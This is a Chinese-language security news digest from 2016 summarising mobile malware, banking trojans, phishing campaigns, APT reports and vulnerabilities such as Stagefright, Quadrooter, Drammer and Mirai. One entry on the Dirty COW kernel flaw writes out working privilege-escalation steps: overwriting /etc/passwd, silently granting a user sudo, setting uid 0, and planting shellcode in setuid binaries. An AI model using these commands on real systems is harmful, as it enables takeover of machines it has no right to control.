360安全团队监测到爱拍网被挂马,用户访问网站时,有一定几率加载NeutrinoEK而造成感染勒索软件——磁盘文件被加密。
-
7.14 This Android Trojan blocks the victim from alerting banks
嗯,拦截用户打给银行的电话以禁止用户挂失银行卡。
-
7.14 水果大战僵尸 - 攻击非越狱 iOS 的恶意软件,来自 ShakaCon 会议的演讲
梓航在ShakaCon上的演讲,介绍了非越狱ios设备上的恶意代码几种形态以及攻击/感染方式。
-
7.15 我如何从Instagram, Google 以及 Microsoft偷钱的
主要是利用这些服务在注册电话认证时,拨打收费服务
-
7.15 每日钓鱼站点追踪
icloud钓鱼居多,但未做及时更新?
-
7.18 CVE-2016-1865:不可利用、无沙箱保护的OS X/iOS空指针引用内核 Crash 漏洞
不可描述
-
7.19 针对 Amazon 钓鱼攻击事件的分析
利用合法域名钓鱼、点击初始化URL将用户重定向到托管网络钓鱼网站,对访问者的信息跟踪
-
7.19 手机恶意程序盗取个人信息形势分析报告
2016年4月,360互联网安全中心共截获盗取个人信息的手机恶意程序样本9.8万个。其中67.4%的样本会窃取短信信息,34.8%的样本会窃取手机银行信息,10.%的样本会窃取手机联系人信息
可做数据来源
-
7.20 揭秘:攻击者如何在Kali Linux中搭建钓鱼热点
不可描述
-
7.21 iPhone和Mac用户请注意:接收一条MMS消息,你的密码可能就被盗了
苹果设备ImageIO中、编号为CVE-2016-4631的高危漏洞的利用,只要给受害者的苹果设备发条MMS多媒体消息,或者iMessage,攻击者就能获取到用户的身份凭证信息
-
7.21 斯诺登介绍反间谍iPhone外壳附件
通过外部扩展设备获取SIM卡插槽,连接到手机的内部布线,可防止通过无线电信号进行监视
-
7.22 Details+POC of Android Stagefright (CVE-2016-0835、CVE-2016-0836)
影响Android OS 6. — 6..1,允许远程攻击者通过制作媒体文件执行任意代码或导致服务(内存破坏)拒绝
-
七月24日,盘古团队开放了关于iOS 9.2至iOS 9.3.3的越狱插件,但是本次越狱工具只支持64位的设备,比如iPhone 5和iPad mini为例。这次iOS和以往有着一些不同——新版本的越狱程序对系统文件改动极少,也就是说,出现白苹果的几率会大幅度下降,并且用户可以重启设备后切换设备为越狱或未越狱状态。在需要越狱环境的时候,就切换到越狱状态;在不需要越狱环境的时候,就切换到未越狱状态。
-
7.26 Trojanized Propaganda App Uses Twitter to Infect, Spy on Terrorist Sympathizers
该间谍软件通过主流社交媒体和公开的web服务来传播。主要针对中东地区,针对 ISIS sympathizers and Islam radicals。恶意软件伪装成一个名为Al Rayan Radio的播放器应用。该间谍软件使用一个检出名为Android/SandroRAT.C!Gen的远程访问工具。该间谍软件可以拦截手机通信,控制摄像头和麦克风,获取用户位置及网络连接信息,读取及修改通讯录和短信,访问SD卡来下载或上传文件。
根据平底锅也有对具有同源性的病毒SpyNote进行了分析:无需root权限,安装新的apk更新恶意软件,获取短信及通讯录信息,窃听麦克风,控制摄像头,获取IMEI号,Wi-Fi MAC地址,手机运营商信息,获取设备GPS位置,电话该设备等。。
-
7.26 台湾第一银行ATM机“自动吐钱”事件分析
首先黑客感染内部主机,进行内部渗透取得网络拓扑(含派送机制),然后通过ATM更新派送伺服务器部署相关吐钞程式及清除痕迹工具,通过通讯软件远程遥控ATM自动吐钱,完成盗领后,远程操控者再将隐藏控制程序、纪录文档、执行文档全部清除
-
通过一款名叫Keysniffer的建议装置,许多无线键盘的信号都能够被攻击者轻松拦截(会暴露输入的用户名、密码等信息),且可以覆盖250英尺的距离(76米)
-
7.27 “XKeyscore”全球隐私通讯监控计划-美国国家安全局手中的Google
英国卫报首次报道了美国国家安全局的XKeyscore计划,该计划可以对目标用户的网络搜索数据,电子邮件,隐私文件,用户名和密码,以及其他的个人通讯信息进行实时监控。XKeyscore计划可以从全球通信骨干网络中不断获取网络通信数据,这些数据会通过光纤电缆传输到美国国家安全局的服务器中,相关技术人员可以对这些数据进行进一步分析。从2008年开始,为了支持这一监控系统的正常运作,美国国家安全局已经在全球150多个国家和地区设置了超过700台网络服务器,其中包括美国,墨西哥,巴西,英国,西班牙,俄罗斯,尼日利亚,索马里,巴基斯坦,日本,澳大利亚,以及其他的多个国家和地区在内。
-
通过短信针对iOS用户,欺骗用户苹果帐户已被暂时锁定,哄骗用户访问一个钓鱼网站,以盗取真正的苹果凭据
-
0x07
-
8.1 如何滥用手机支付 APP Venmo 和 Siri,两分钟偷2999.99 $
利用siri可在锁屏情况下读、发短信的功能,配合手机支付APP Venmo进行短信支付。(短信回复确认即可。)
-
8.1 FreeBuf发布2016年上半年金融行业应用安全态势报告
从传统金融(银行、保险、证券),互联网金融(P2P、分期、众筹、第三方支付、大数据金融)8个金融行业细分领域,针对应用安全脆弱性及安全漏洞态势进行综合分析和评定。目标列表很详细!
-
12年雅虎被脱裤,至今才放出用户信息被售卖的消息。
-
8.2 安卓8月安全补丁风险评估
对比分析7、8月份Android漏洞分布情况;详细分析Aosp高风险安全漏洞、kernel高风险安全漏洞、高通和MTK的驱动漏洞及受影响进程列表
-
8.3 New Gozi Trojan Version Can Bypass Some Behavioral Biometrics Defenses
新版本的Gozi银行木马目前活跃在日本,西班牙,波兰等国家,主要针对金融机构,如PayPal,花旗银行,法国兴业银行,法国巴黎银行,东京银行等。新版本的Gozi使用Web injection attacks,支持人工操作,增加了绕过基本行为特征的防御支持
-
8.4 深度揭秘微信地下产业链的形成
微信的地下产业概述,素材很多。
-
8.4 伪基站检测将在全国公安系统全面落地 附《反电信网络诈骗大数据季度报告》全文
“麒麟”基于腾讯手机管家的黑产数据库,通过腾讯“安全云库”的风险网址、骚扰诈骗电话、欺诈短信、木马文件、APK、黑银行卡等内容,进行机器学习和模型识别,找出恶意的网址和欺诈电话,并结合LBS定位信息,对发布欺诈信息的伪基站实现50米内的实时精准定位;同时,通过与警方的联动,跟进恶意网站和APK制作者,从而对电信网络诈骗的源头进行打击。
-
8.4 360追日团队APT报告:摩诃草组织(APT-C-09)
摩诃草组织(APT-C-09),又称HangOver、VICEROY TIGER、The Dropping Elephant、Patchwork,是一个来自于南亚地区的境外APT组织,该组织已持续活跃了7年。主要针对中国、巴基斯坦等亚洲地区国家进行网络间谍活动,其中以窃取敏感信息为主。相关攻击活动最早可以追溯到2009年11月,至今还非常活跃。在针对中国地区的攻击中,该组织主要针对政府机构、科研教育领域进行攻击,其中以科研教育领域为主。
-
8.6 三星支付曝安全隐患,可被远程盗刷
三星移动支付功能Samsung Pay是基于磁性的非接触支付系统,可以把信用卡数据转换为标记,黑客可以盗用Samsung Pay产生的标记, 然后用它在其它设备中不受限制的进行欺诈交易。所有银行的信用卡、借记卡和预付卡都将会受到此类攻击的影响
-
MONSOON is the name given to the Forcepoint Security Labs™ investigation into an ongoing espionage campaign that the Special Investigations team have been tracking and analysing since May 2016. The overarching campaign appears to target both Chinese nationals within different industries and government agencies in Southern Asia. It appears to have started in December 2015 and is still ongoing as of July 2016.
-
8.8 高通曝Quadrooter高危漏洞, 影响全球9亿安卓用户
checkpoint发现了高通的漏洞,危及全线安卓产品。PDF
该漏洞是高通 MSM GPU 驱动的一个 UAF 漏洞(CVE-2016-3842)
数字的播报文章,名为Quadrooter的漏洞由四个漏洞组成:CVE-2016-2503 (发现于高通GPU驱动程序,分析见谷歌的2016年8月Android安全公告);CVE-2016-2504 (高通GPU驱动程序中,分析见谷歌的2016年7月Android安全公告);CVE-2016-2059 (高通内核模块中,4月修复,补丁状态未知)以及CVE-2016-5340 (高通GPU驱动程序中,已修复,补丁状态未知)。翻译版
-
8.9 顶级网络间谍平台ProjectSauron正在悄悄地窃取政府的加密通信数据
ProjectSauron包括一个十分复杂的模块化网络间谍平台,该平台采用了隐蔽性非常强的隐藏生存机制,并能够对目标进行长期的网络间谍活动。在对该平台进行了深入分析之后,我们发现攻击者可以利用该平台学习其他攻击者的先进技术,并避免重复他们此前所犯的错误。
真正的高级APT组织和普通的黑客组织之间有什么区别呢?我们在下方列出了顶级网络间谍组织所特有的一些表征:
- 利用0 day漏洞进行攻击;
- 未知的、无法检测的初始感染载体;
- 已经成功入侵过多个国家的政府机构;
- 在被发现之前,已经成功进行了多年的信息窃取活动;
- 能够从空气间隙网络系统中窃取数据;
- 恶意软件模块能够驻留在内存中,而无需触及硬盘;
- 拥有罕见的持久化技术,能够使用未经记载的操作系统功能;
“ProjectSauron”基本符合上述的特性。
-
公安部刑侦局与蚂蚁金服合作开发的“伪基站实时监控平台”已在全国各地公安机关投入使用。公安部刑侦局与蚂蚁金服于今年3月合作开发了“伪基站实时监控平台”,实现了对伪基站的实时监控。据蚂蚁金服安全部相关负责人介绍,基于蚂蚁金服及 阿里巴巴 的大数据模型推出的伪基站实时监控平台,能做到伪基站50米内精准定位。
-
8.9 索伦之眼(Eye of Sauron)顶级 APT 攻击 - 卡巴斯基的分析
索伦之眼(Eye of Sauron)顶级 APT 攻击,由 Strider 间谍组织发起,目标为多个国家政府部门和关键行业组织:
- Government
- Scientific research centers
- Military
- Telecommunication providers
- Finance
-
8.9 关于近期曝光的针对银行SWIFT系统攻击事件综合分析
SWIFT系统安全问题:从2015年1月的厄瓜多尔银行损失1200万美元,10月的菲律宾银行,到今年2月孟加拉国央行曝出被盗窃8100万美元,随后第二家及第三家银行(也是最初受害者)被黑的消息被公开。5月菲律宾一家银行又被盗,这次他们又造成乌克兰银行上千万美元的损失。
-
巴西最为流行的邮件诈骗主要有两种形式:一类是冒充富人的求帮助诈骗:骗子冒充外国有钱人,请求受害者协助其完成跨国捐献,或向境外转移现金和资产;另一类,是冒充穷人的扮可怜诈骗:骗子伪装成女性或未成年人,以家中贫困,无钱治病或无钱读书为由,祈求受害者为其捐款。
-
分析勒索软件发展趋势、大型数据泄露事件、身份认证盗窃、移动安全、物联网、增强现实游戏等
-
8.15 SecurityScorecard发布2016年上半年美国金融行业网络安全情况报告
可作为统计数据来源
-
8.19 一款新的 Mac OS X 恶意软件出现 - OSX.FakeFileOpener
MacOS下的病毒还是比较稀少的。
-
8.22 东巽科技2046Lab团队APT报告:“丰收行动”(DX-APT1)
2016年7月,东巽科技2046Lab捕获到一例疑似木马的样本,该木马样本伪装成Word文档,实为包含CVE-2015-1641(Word类型混淆漏洞)漏洞利用的RTF格式文档,以邮件附件的形式发给攻击目标,发动鱼叉式攻击。从溯源和关联分析来看,种种迹象表明,该样本源于南亚某国隐匿组织的APT攻击,目标以巴基斯坦、中国等国家的科研院所、军事院校和外交官员为主,通过窃取文件的方式获取与军事相关情报。由于样本的通信密码含有“January14”关键词,这一天正好是南亚某国盛行的“丰收节”,故把该APT事件命名为“丰收行动”。
-
8.22 微信惊现任意代码执行漏洞 360手机卫士提供自检方案
360的Alpha Team发现了一个微信的远程任意代码执行漏洞 badkernel。该漏洞是Chrome V8引擎3.20至4.2版本中存在远程代码执行漏洞(漏洞编号:CNNVD-201608-414),由于源代码中“observe_accept_invalid”异常类型被误写为“observe_invalid_accept”, 造成kMessages关键对象信息泄露,从而可利用该漏洞执行任意代码。
-
8.22 小米短信同步让父母银行卡被盗10万?扒一扒事情的来龙去脉
利用小米账号云同步短信,窃取支付验证码,然后删除手机内的验证码短信。
-
对恶意网站分类做了简单介绍说明。对钓鱼网站做了一些代码分析,可读性不错。
-
8.24 针对记者的android恶意软件有所增加
如何针对记者的我没看明白。
-
8.25 只截一张图,截走银行卡几千元
利用用户对付款码和收款码的区分不明,骗用户截图付款码进行骗钱操作。
-
8.29 爆料全球首个基于Twitter的Android僵尸网络
Twitoor可以使用Twitter社交网络来控制目标用户的安卓智能手机。这款恶意软件会定时对指定的Twitter账号进行检查,然后从该Twitter账号所发布的加密推文中读取出控制命令。(早前国内出现过的利用blog进行远控原理一样,玩剩下的了。)
-
8.31 木马如何欺骗GooglePlay
提到了木马所使用的两种欺骗gp安全审查机制的方法,用以绕过安全审查,后台推送应用赚钱。
- 自点击购买或者允许下载按钮( Accessibility services 、 模拟点击 、 进程注入)
- 自构造网络针对gp的网络请求进行下载。(还能评论)
-
8.31 Dr.web:2016年8月病毒活动分析
可作为统计数据的来源
-
8.31 DressCode Android Malware Discovered on Google Play
一个名叫DressCode的新Android恶意软件家族,能够利用代理攻击企业内部网络、并窃取此前曾被认为是安全的服务器信息。该恶意软件取名自数不清的装扮类游戏。从技术层面上分析,DressCode恶意软件所包含的恶意代码,会劫持被感染的设备并连接至一个僵尸网络。该恶意软件会扮演成一个信标,然后持续地与僵尸网络的命令控制(C&C)服务器通讯。在需要下达指令的时候,服务器端只要ping一下肉鸡设备就可以执行了。值得一提的是,该恶意软件还利用了SOCKS代理来掩藏与C&C服务器之间的通信,甚至允许僵尸网络操控者突破防火墙访问企业内部的深层网络,窃取信息或提升自己的访问权限。
-
-
0x08
-
9.2 ~ 9.7 关于PEGASUS iOS内核漏洞
-
9.7 Pegasus 监控软件所用的 X.509 根 CA 证书的细节
针对CVE-2016-4656报告中的内核漏洞进行了详细分析。PEGASUS监控工具所使用的三个内核漏洞详情苹果并未公开。国内翻译版
-
9.4 隐藏Android系统Root状态?这个APP可以帮你做到
谷歌使用了一个名为“SafetyNet”的API来检测用户的Android设备是否root过,如果设备已经root过了,那么它就要限制设备访问上述的那些功能。
名为“Suhide”的APP,允许用户针对特定的应用程序来隐藏Android设备的Root状态。例如可让root过的Android设备使用AndroidPay功能,同样可以使用其他的一些需要检测设备root状态的应用程序
-
9.7 木马System Monitor:来自Android Accessibility安全性研究报告
木马“System Monitor”可以隐藏图标、自我保护、劫持搜索,有以下这些行为:
- 该木马表面伪装成手机安全软件,启动后以安全软件的界面诱导用户启动辅助功能(Android Accessibility)以“完成安装”,此处的页面描述“Malware Protection”字样由木马设定,意在进一步诱导用户相信其为一款安全软件。
- 防止被卸载
- 安装该恶意软件后打开浏览器的页面,会打开特定的网址,点击浏览器中的可点击视图,则一有定几率触发打开一个新的网址。
-
漏洞编号为CVE-2016-3862,只要有人给你发一张照片,用户甚至不需要点击这张照片,手机自动对照片进行解析时,黑客就能远程控制Android设备,或者令设备变砖
-
可作为统计数据的来源
-
- 从事故表现来看,此次事故出现的问题是账号串号和数据库的问题。其中,串号问题严重泄露了用户隐私,如果在接下来两天中有匿名回答和私信被公开,似乎知乎难辞其咎。
- 事故发生后知乎直接切断了服务器,看起来,似乎是数据库没有备份?如果有备份,则可以直接切换到备份服务器,而不至于粗暴切断影响普通用户的正常使用。
- 出现此类问题,要么是内部误操作,要么是外部攻击。看起来前者的可能性更大,假如是真,背后可能影射出的是知乎内部的管理和操作流程方面的问题,也可能会导致内部相关工作人员受到较严厉的处罚。
-
QQ空间超级补丁技术、微信Tinker、阿里百川HotFix
-
9.10 有漏洞:20 万部僵尸手机就能攻陷美国 911 报警系统
利用远控手机对报警系统进行电话ddos而已。
-
9.12 曝魅族Flyme大漏洞!黑客锁机勒索用户
根据官方解释,是遭到了撞库攻击,导致黑客利用Flyme的远程锁机功能锁定了用户的手机。
-
9.13 DualToy 通过 USB 连接向 Android/iOS 推送高风险 APP 的木马
The trojan, named DualToy, has been active since January 2015, but in its original form, it was only capable of infecting Android devices.DualToy received support for infecting iOS devices six months later, but the number of real-world infections only recently spiked, according to a Palo Alto Networks report, reaching 8,000 different samples detected in the wild.
-
9.13 逆向工程小米Analystics应用:小米能安静的安装任意包
小米的数据分析或异常分析核心程序存在后门漏洞,可被用于安装任意app。
-
9.14 BadURLScheme in iOS
这个漏洞主要是在iOS对于URL Scheme及其在UIWebView等控件的自动诊断识别等处理机制下导致跨应用XSS漏洞。
-
我们并非通过bindiff等复杂手段定位该漏洞,所以。。。这是一个悲伤的。。。撞洞的故事。。。
实际情况是当苹果发布9.3.5版本后,我们测试了手中的漏洞,结果发现这枚未满周岁的信息泄露漏洞不幸阵亡 TT
-
9.14 Rooting Pokémons in Google Play Store
针对Pokémon Go的木马在Google Play上被发现,程序名字为Guide for Pokémon Go;它能隐藏自己,并推送大量广告,可以root设备并安装大量的恶意文件夹和不需要的APP。木马会给远程控制服务器发送信息,包括感染设备的型号,系统版本,国家,语言等等。
-
The researcher’s technique involved several steps and quite a bit of patience and work, but eventually Sergei Skorobogatov of the University of Cambridge in the UK was able to remove the NAND Flash memory chip, backup the data on it, reinstall the chip and continue trying passcode. Skorobogatov estimates that using this technique, an attacker could brute-force a four-digit passcode on an iPhone 5C in less than 24 hours.
-
9.18 都是权限惹的祸:安卓恶意APP如何将其他APP中的私有数据搞到手
可以读取Android手机中其他app的文件元数据,例如文件的名称、大小、以及最后修改日期等等。如果文件名中含有敏感信息的标识,那么这款恶意app会将这份文件识别为敏感文件,并且还可以对其进行暴力破解攻击。
-
9.18 Android安全新特性?细数Android7. Nougat的几大安全增强功能
直接启动模式;
全新加密机制;
重新设计了mediaserver的整体架构;
应用安全性提升——数据共享权限限制、网络通信数据访问权限、网络安全策略;
移除了某些可以持久访问目标设备的标识,例如设备的MAC地址;
用户接口层将无法显示在权限对话框之上;
禁用了onDisableRequested();(设备管理器可取消)
-
9.19 国内首个网络安全行业全景图重磅推出
安全牛以自身在安全行业的认识和积累,结合多种行业资源,在《中国网络安全企业50强》调查工作的基础上,推出国内首个网络安全行业全景图
-
9.19 腾讯科恩实验室最新研究成果:对特斯拉的无物理接触远程攻击
利用安全漏洞对特斯拉进行无物理接触远程攻击,实现对特斯拉驻车状态和行驶状态下的远程控制
-
9.19 国内首个网络安全行业全景图重磅推出
在《中国网络安全企业50强》调查工作的基础上,推出国内首个网络安全行业全景图
-
9.20 利用 Exploit 获取 Root 权限的 Android 银行木马
in early February 2016, Kaspersky Lab discovered Trojan-Banker.AndroidOS.Tordow.a, whose creators decided that root privileges would come in handy. We had been watching the development of this malicious program closely and found that Tordow’s capabilities had significantly exceeded the functionality of most other banking malware, and this allowed cybercriminals to carry out new types of attacks.
-
9.20 Blender: Self-randomizing Address Space Layout for Android Apps
针对Android 5.x 版本ASLR机制的安全性,本文介绍了一种新的攻击方式:return-to-art (ret2art),并且针对这种方式提出了相应的解决方案
-
9.22 2016 中国互联网仿冒态势分析报告
仿冒应用的统计数据
-
9.22 捍卫互联网安全,国内各大SRC集锦
集中记录了各大厂商的SRC。
-
CVE-2016-6415漏洞影响到IOS、IOS XE和IOS XR软件:具体影响到IOS XR版本4.3.x、5..x、5.1.x和5.2.x(5.3.及更新版本不受影响),所有IOS XE,以及数个IOS版本,详情可见思科的安全公告.CVE-2016-6415漏洞存在于IKEv1包处理代码中,利用该漏洞可致远程、未认证的攻击者获取存储内容(memory contents)。
-
9.26 Gemalto:2016上半年泄露级别指数调查报告
泄露级别指数解读,包括数据泄露类型、来源分布;数据泄露行业和地理区域分布;不同国家和行业数据泄露成本的分析
-
9.27 QQ 浏览器(Wormable Browser) 漏洞报告
安卓版QQ浏览器,QQ热点等应用程序在本地wifi开始时,会监听本地8786端口,且监听本地所有ip地址。当攻击方和被攻击方处于同一局域网环境时,通过该接口,可在局域网内运行QQ浏览器,QQ热点的设备中上传数据、启动应用安装等。当这些应用拥有root权限时,可静默安装移动应用。攻击方和被攻击方处于不同局域网环境时,可通过恶意链接,远程植入,感染与被攻击方所在局域网内所有运行安卓版QQ浏览器,QQ热点等应用的主机。
-
9.27 猎捕利比亚的蝎子 - 针对利比亚高级间谍攻击行动的调查报告
8月初,Cyberkov接收到了一类大量感染利比亚国内安卓手机用户的恶意软件样本,这些样本尤其在黎波里和班加西比较活跃,它们通过手机Telegram程序广泛传播,主要针对有影响力的社会名流和政治人士。该类恶意软件感染手机之后,会继续向通讯录人员散播恶意程序Voice Massege.apk,形成更大的受害者网络。经调查分析,确信这是由某政党发起,并以情报收集和秘密监视为目的恶意软件攻击活动。在调查中,Cyberkov还发现了多例感染电脑和智能手机的相关恶意软件。Cyberkov把该攻击活动命名为“利比亚天蝎”。译文
-
9.27 一款针对韩国用户的手机银行木马
恶意程序伪装成合法应用程序V3 Mobile Plus,一旦受害者安装,该应用要求管理员权限,进而隐藏图标,迷惑受害人认为该程序已被删除。 主要目的是窃取受害者的短信和在国家PKI方案中使用认证证书,并发送给其C&C服务器
-
议题内容涵盖漏洞利用工具包分析、动态DNS、PDNS、被动威胁感知和APT真实案例五个方面。
-
9.28 赛门铁克发现中国Android 勒索软件正在使用伪随机密码和双锁屏攻击
赛门铁克安全团队最近发现,Android.Lockscreen(锁屏恶意软件)的新变种正在通过伪随机密码,阻止受害者在不支付赎金的情况下解锁设备。此前,这类勒索软件的早期版本使用硬编码密码锁定屏幕。然而,安全专业人士能够对代码进行反向工程,为受害者提供密码解锁设备。此外,攻击者通过结合自定义锁屏和设备锁屏来增加解锁难度。
-
根据MalwareBytes接触到了前期入侵越南组织机构的间谍程序捕获样本,入侵活动涉及7月底对越南两大机场的攻击事件,攻击中使用的恶意软件用于窃取越南航空公司40万会员信息。这些入侵活动中使用的攻击载荷是伪装成杀毒软件McAfee的Korplug RAT变种
-
9.30 大数据告诉你:移动、联通、电信的安全指数
-
-
0x09
-
10.8 OilRig campaign, Iran-Linked Hackers Target US Government & Energy Grid
OilRig活动,伊朗挂钩黑客的目标,美国政府和能源电网
-
10.9 Spotify的免费用户受到恶意广告活动
-
10.9 黑科技:把第三方 iOS 应用转成动态库
本文会介绍一个作者写的工具,能够把第三方 iOS 应用转成动态库,并加载到自己的 App 中,文章最后会以支付宝为例,展示如何调用其中的 C 函数和 OC 方法。工具开源地址
-
一个挖掘app网络交互漏洞的过程分享。
-
10.10 Broadcom Wi-Fi 驱动提权漏洞分析
在Wi-Fi芯片的运行需要相应的驱动,这些驱动运行在Linux内核态,如果驱动出现漏洞,将导致代码以内核权限运行,从而造成提权的后果。Broadcom公司的Wi-Fi芯片被大量的Android手机使用,其漏洞的影响范围十分广泛。Broadcom Wi-Fi驱动的提权漏洞(CVE-2016-2493)。
-
10.11 黑客讲述:我如何用技术手段逼小偷把iPhone还回来
在钓鱼网站在输入密码以后,钓鱼网站让我输入密保信息,我在答案输入框中输入了 XSS 代码,然后就成功提交了。
-
10.11 850多万就这样没了,这样的骗局能不能避免?
骗子从10月26日到11月23日这将近一个月的时间内,分5次让受害者将850多万元转到被骗子控制的这个账户上,再通过木马控制网银手段全部转出。金额之大,周期之长,实属罕见!真可谓缔造了诈骗界的一场神话!
-
10.11 Android系统新权限模型剖析与预警
仿冒KingRoot官方应用的恶意样本,图标与应用名称都与官方应用相同。
当恶意软件被授予短信组权限时,其利用已获取的短信组权限接收系统短信广播并拦截新接收到的短信,窃取短信内容,造成用户隐私泄露。
该恶意软件的其他恶意行为包括:诱导用户激活设备管理器、� 隐藏图标、检测并获取Root权限、发送扣费短信、 窃取用户隐私信息
-
10.13 Android Banking Trojan Asks for Selfie With Your ID
Android银行木马Acecard的新变种,又名Torec,其使用Tor与控制服务器通信,除了要求银行卡信息,双因素认证信息以外,该恶意应用还设法获取一些身份认证的私人信息。(这些信息可帮助罪犯确认受寒者身份,获取不仅仅是银行账号,更多者受害者社交网络相关的一些信息。)
伪装成一个成人播放器应用或者是看特定视频文件所需的插件,诱导用户下载安装。运行后,隐藏图标并设法获取设备管理权限,以使其难以被卸载。在后台运行以后,木马持续监控特定APP的开启操作,并将钓鱼页面覆盖其上,伪装成Google Play,要求银行卡号。一旦银行卡号经过确认,下一个钓鱼页面设法获取更多私人和银行卡信息,比如持卡人姓名,出生日期,电话号,信用卡截止日期和CCV,该木马也要求双因素认证的信息。
-
10.13 12 年前的一个 SSH 老漏洞正在被黑客用于攻击大量 IoT 设备
Researchers at Akamai this week exposed how attackers are using a 12-year-old SSH vulnerability in combination with weak or default credentials to compromise an array of IOT and home networking devices. Those connected things are then being used as proxies to test stolen credentials on third-party web-based applications.
-
10.17 移动APP安全揭秘之第二期:授权登录的安全短板
-
How to: Testing Android Application Security
-
10.18 子域名搜集思路与技巧梳理
-
10.18 谁给了你第一个手机病毒?安卓手机病毒来源分析
-
10.18 仿冒公检法手机诈骗简析
-
10.19 告诉你被盗的iPhone是如何一步步被黑客解锁的
-
10.19 攻击 Android OTA(空中下载)技术
-
10.19 从漏洞利用工具到零日漏洞:网络黑市大全
-
10.19 “九头虫”病毒技术分析报告
“九头虫”病毒利用多家知名root sdk对设备提权,病毒一旦发作,设备将不断弹出广告,并自动下载、安装、启动恶意应用,最终设备衰竭而死,用户很难通过常规的卸载手段清除病毒 相关阅读:安天AVL联合小米MIUI首擒顽固病毒“不死鸟”
-
10.19 Malware posing as Dual Instance app steals users’Twitter credentials
恶意软件别名为Dual Instance,可以用来多开。 伪装成官方的Twitter证书,通过VirtualApp运行原始的Twitter,恶意软件在用户设备上启动之前,会先设置一个本地的VPN服务,以保证在中国地区能正常登录。 恶意软件启动后,劫持用户的Twitter登录身份和密码,并将用户的登录凭据上传他们到远程服务器上。
-
10.20 针对中国 Apple 用户的钓鱼活动再次复活
-
10.20 IoT安全系列-如何发现攻击面并进行测试
-
10.20 银行木马(Zeus、Citadel、Rovnix、Vawtrak、Dridex、Tinba、GozNym)是如何逃避恶意软件分析的
-
10.21 如何用kwetza给安卓应用加后门
-
10.21 QQ手机浏览器“虫洞漏洞”挖掘分析全过程
-
10.23 iCloud Attacks Expand
针对苹果iCloud账号进行钓鱼诈骗的分析
-
10.23 Paypal的双因子验证绕过
-
10.24 Android逃逸技术汇编
-
10.24 阿里聚安全扫描器之本地拒绝服务检测详解
-
10.24 GM Bot: Alive and Upgraded, Now on Android M
银行木马GM Bot的新版本,针对 Android 6,可绕过平台的新安全特性。更新后的GM Bot木马可在安卓全版本运行
-
10.24 新型iPhone漏洞(CVE-2016-4673)
10.24 Your iPhone Can Get Hacked Just by Opening a JPEG Image, PDF or Font File 10.26 苹果修复恶意JPEG利用漏洞及大量安全漏洞
-
10.26 Samsung Pay漏洞深度剖析
-
10.26 一款开源的后门工具
-
10.28 尴尬了,以色列数字取证公司软件遭泄漏
-
10.28 阿里一周资讯
Mirai僵尸网络、脏牛漏洞、Drammer
-
CVE-2016-5195脏牛漏洞
Linux内核通杀提权漏洞;
Android 7.0最新的10月补丁安全级别的系统上测试过漏洞POC,确认Android受影响
1) 在/tmp/.pwn写入 \#!/bin/bash echo MOOOOOOOOOOO /bin/bash chmod +x /tmp/.pwn 然后修改/etc/passwd中的shell指向 ./dirtyc0w /etc/passwd root:x:0:0:root:/root:/tmp/.pwn 2) 添加用户到sudo组 ./dirtyc0w /etc/group "$(sed 's/\(sudo:x:.*:\)/\1test1/g' /etc/group)" 下次管理员再登陆的话 sudo su 不需要密码 3) 将/etc/passwd中的uid位改为0 4) 注入shellcode到suid文件,比如最常见的2个文件 /usr/bin/crontab /usr/bin/passwd
10.21 CVE-2016-5195脏牛漏洞:Linux内核通杀提权漏洞
10.23 对CVE-2016-5195脏牛漏洞分析
POC DirtyCow 漏洞(CVE-2016-5195) Android 版本的 PoC
10.24 利用 Ptrace 和 vDSO 实现提权的 DirtyCow PoC
10.25 CentOS 脏牛漏洞补丁已经发布
10.27 CentOS 7发布内核修复补丁 修复“Dirty COW”提权漏洞
10.28 针对android(32位)利用的脏牛漏洞bash脚本
-
CVE-2016-6728(Android Rowhammer Exploit)((Drammer)
Drammer利用的是内存芯片设计上的一个缺陷,针对android设备的攻击方式。并且这个问题并不是只出现在Android系统上,而是所有使用内存的系统都会出现这个问题 10.24 使用Rowhammer bitflips 获取android手机root权限
Rowhammer攻击指的是在新一代DRAM芯片上反复访问一行内存,而这种操作将有可能造成相邻内存行的数据发生比特翻转,这种攻击技术将允许任何人修改设备内存中保存的数据内容。
10.25 Drammer:利用“风水逆转”技术Root你的手机
10.26 通杀所有系统的硬件漏洞?聊一聊Drammer,Android上的RowHammer攻击
论文及POC drammer
-
10.27 The DrK (De-randomizing Kernel ASLR) attack
一个基于硬件的通杀所有OS的漏洞
-
Mirai僵尸网络
北美DNS服务商遭Mirai木马DDoS攻击,美国半个互联网瘫痪
10.13 Mirai源码分析报告
10.22 DNS服务提供商遭遇几波大规模DDoS攻击,美国半个互联网瘫痪
10.24 IoT僵尸网络严重威胁网络基础设施安全 - 北美DNS服务商遭Mirai木马DDoS攻击的分析思考
10.24 关于 dyn / twitter 受攻击情况的说明和 mirai 僵尸网络的回顾
10.27 “红遍全球”的恶意软件Mirai,你所需要知道的那些事
10.28 关于mirai僵尸网络控制主机的数据分析
10.28 Mirai物联网僵尸攻击深度解析
-
10.28 腾讯手机管家查获四款万圣节APP藏毒 盗取用户流量
包括搞怪相机、万圣节换装狂欢、万圣节装扮、鬼魂相机在内的四款应用均属于恶意软件,被黑客植入广告代码和恶意插件,在联网状态下会自动下载软件,造成手机流量消耗,并带来大量手机垃圾和经济损失
-
10.31 HackerOne第三季度TOP 5 漏洞报告
-
10.31 滥用iOS代码签名欺骗应用程序和绕过隐私保护的Masque攻击
Masque Attack 漏洞曾于2014年出现过,后被修复,针对iOS的Masque Attack威胁依然存在
-
10.31 中国APT组织莲花(Lotus Blossom)发出钓鱼邀请函,假意邀请目标受害者参加Palo Alto Networks即将召开的网络安全峰会
-
0x10
-
11.1 一款针对Android设备的假Flash Player通过诱使用户下载来安装可窃取信用卡信息的恶意银行软件
恶意软件伪装成Flash Player,安装启动后会通过一个虚假的google play服务页面来请求设备管理员权限。
该恶意软件可以拦截短息及发送短信息,安装后会收集包括IMEI、国家、安卓版本、设备型号、电话号码、安装应用等相关的信息发送到远程控制服务器,并接收相关指令。
-
11.1 逆向修改 Android 内核绕过反调试
-
11.2 ios测试神器needle使用环境搭建
-
11.2 普通硬件就能破解GSM A5加密算法
-
11.2 MySQL / MariaDB / PerconaDB - 提权/条件竞争漏洞(附POC)(CVE-2016-6663 / CVE-2016-5616)
-
该病毒通过重打包将恶意代码嵌入到一些正规应用中,并通过广告推广,该病毒会尝试ROOT完全控制用户手机,并不断弹出骚扰广告。
魔绑恶意广告病毒还会尝试下载地狱火和伏地虫等恶名昭彰的ROOT病毒,对用户手机安全造成严重威胁。
-
